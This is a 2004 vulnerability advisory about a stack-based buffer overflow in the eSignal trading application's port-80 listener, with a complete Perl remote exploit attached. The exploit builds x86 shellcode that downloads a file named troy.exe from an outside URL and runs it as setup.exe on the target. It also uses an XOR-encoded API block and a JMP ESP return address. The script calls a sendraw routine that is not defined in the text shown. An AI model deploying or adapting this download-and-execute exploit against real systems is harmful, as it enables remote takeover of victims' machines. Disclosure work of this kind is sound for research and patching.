Systems: Windows (all versions)

Problem: Stack-based buffer overflow

Severity: Remote code execution

Risk: High
-----------------------------------------------------------------------------

Product description:
~~~~~~~~~~~~~~~~~~~~
"eSignal is the nation's leading provider of real-time financial and
market information. eSignal is a popular platform for institutional
and professional traders. eSignal is a market data solution bundled
for best value for small to mid-size institutional investors that
also includes additional optional services..."

Vulnerability:
~~~~~~~~~~~~~~
eSignal main application "WinSig.exe" listens for incoming data
requests on tcp port 80.

While parsing requests, it suffers from classic stack-based buffer
overflow, when parameter string is about 1040 characters long:

C:\>telnet localhost 80
<STREAMQUOTE>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....... x 1040
</STREAMQUOTE>

... bang!

Overflow occurs in Specs.dll and EIP is fully controllable, as
the function return address on the stack is completelly overwritten.

Exploitation:
~~~~~~~~~~~~~
Pretty trivial, except that overflow string can not contain NULL-bytes
and all lower-case characters are converted to upper-case.

As we overwrite stack with return address and code, we use standard
"JMP ESP" technique to direct execution back to us.

"jmp esp" opcode was found in MFC71.dll, which is distributed in eSignal
package and loads from program folder, thus making exploit to be eSignal
version specific instead of OS (Windoze) specific.

While I was working on advisory, eSignal released v7.6 which is
vulnerable as well and even more "overflow-friendly", as previous
was compiled with debug bits for ESP value checking at the end of each
procedure. But in both cases it's almost similar.

Proof of concept code:
~~~~~~~~~~~~~~~~~~~~~~
Exploit written in Perl, which downloads and executes file from
the specified URL available here:

http://viziblesoft.com/insect/sploits/vz-eSignal76.pl

Solution:
~~~~~~~~~
Vendor's technical support ignored my request for company's security
contacts. I wasn't surprised, as the most support staff these days is
zombified and can't figure out doing something they were not programmed
to. Plus, company falls into category of "those who does not care"
moneymakers, so after two weeks time I realized there won't be
any answer.

Thus, solution is obvious:

Close tcp 80 to outside world with your favorite firewall.

Disclaimer:
~~~~~~~~~~~
The information in this advisory is believed to be true though
it may be false. Use of this information constitutes acceptance for use
in an AS IS condition. There are NO warranties with regard to this
information. In no event shall the authors be liable for any damages
whatsoever arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

Legal Notice:
~~~~~~~~~~~~~
This advisory is copyright (c) 2004 VizibleSoft.com
You may distribute it unmodified. You may not modify it and distribute
it or distribute parts of it without the author's written permission -
this especially applies to the so called "vulnerabilities databases"
and "security checkers".
-----------------------vz-eSignal76.pl--------------------------------
#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*= http://viziblesoft.com/insect
#
# 25-mAR-2004
#

use IO::Socket;

sub usage
{
die("\nUsage: perl $0 host port\n");
}

print "\r\neSignal v7.6 remote exploit, (c) VizibleSoft.com\r\n";

my $ip = $ARGV[0] || usage();
my $port = $ARGV[1] || usage();
my $data = "";
my $ret = "\xf3\x7b\x20\x7c"; # MFC71.dll "jmp esp"
my $nop = "\x90";

#
# Used api..
#

$api = "\x00wininet.dll\x00InternetOpenA\x00".
"InternetOpenUrlA\x00InternetReadFile\x00kernel32.dll\x00".
"_lcreat\x00_lwrite\x00_lclose\x00";

#
# Url of file to execute
#

$url = "http://viziblesoft.com/insect/sploits/troy.exe";

#
#
# Filename for our file on remote system

$fname = "setup.exe";

#
#
# Shellcode: downloads and executes file at URL
#

$shellc = "\x90".
"\x8B\xEC\x03\xEA\xB8\xEA\xFE\xFF\xFF\xF7\xD0\x03\xE8\x83\xC5\x0B\x8B\xFD\x4F\xF7".
"\x17\x83\xC7\x04\x83\x3F\xFF\x7C\xF6\xF7\x17\xB8\x5C\x12\x14\x7C\x8B\x18\x55\xFF".
"\xD3\x8B\xF8\x33\xC9\xB1\x03\x8D\x55\x0C\xB8\x58\x12\x14\x7C\x8B\x18\x51\x52\x52".
"\x57\xFF\xD3\x5A\x59\x89\x02\x83\xC2\x03\x42\x8A\x02\x3A\xC5\x7F\xF9\x42\xFE\xC9".
"\x3A\xCD\x7F\xDE\xB8\x5C\x12\x14\x7C\x8B\x18\x8D\x55\x3C\x52\xFF\xD3\x8B\xF8\xB8".
"\x58\x12\x14\x7C\x8B\x18\x53\x8D\x55\x49\x52\x52\x57\xFF\xD3\x5A\x89\x02\x8B\x1C".
"\x24\x8D\x55\x51\x52\x52\x57\xFF\xD3\x5A\x89\x02\x5B\x8D\x55\x59\x52\x52\x57\xFF".
"\xD3\x5A\x89\x02\x33\xD2\x52\x52\x52\x52\x55\xFF\x55\x0C\x33\xD2\x52\xB6\x80\xC1".
"\xE2\x10\x52\x33\xD2\x52\x52\x8D\x4D\x60\x41\x51\x50\xFF\x55\x1A\x89\x45\x1A\x33".
"\xD2\x52\x8D\x55\xF6\x52\xFF\x55\x49\x89\x45\x49\x33\xD2\xB6\x02\x2B\xE2\x83\xEC".
"\x04\x33\xD2\xB6\x02\x54\x8B\xC4\x83\xC0\x08\x52\x50\x8B\x45\x1A\x50\xFF\x55\x2B".
"\x8B\x04\x24\x8D\x54\x24\x04\x50\x52\x8B\x45\x49\x50\xFF\x55\x51\x83\x3C\x24\x01".
"\x7D\xD7\x8B\x45\x49\x50\xFF\x55\x59\x8D\x55\xF6\x52\xB8\x3F\x0E\x81\xF8\x35\x80".
"\x80\x80\x80\xFF\xD0\xB8\xD3\xFC\x80\xF8\x35\x80\x80\x80\x80\xFF\xE0$fname";

$movsb = "\x90\x33\xc9\xb5\x02\xb1\xcc\x8b\xf4\x2b\xf1\x8b\xfc\x33\xd2\xb2\x15\x03\xfa\xf3\xa4";

#
# xor data block
#

$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
$data = $data . (substr($url, $i, 1) ^ "\xff");
};

$data .= "\xff\xff\xfe\xfe\xff\xff\xff\xff";

#
# construct overflow string...
#

$shellc .= $data;
$shellc .= ("\xcc" x (712 - length($shellc)));

$shellcode = $nop x (8 * 16) .
$shellc .
$ret .
$movsb .
$nop x (191-16);

# print "shellcode len: " . length($shellcode) . "\r\n";

$data = '<STREAMQUOTE>' . $shellcode . '</STREAMQUOTE>';

# print "sending data of len: " . length($data) . "\n";

print sendraw($data);

print "[+] Overflow sent / file executed!\n";
exit;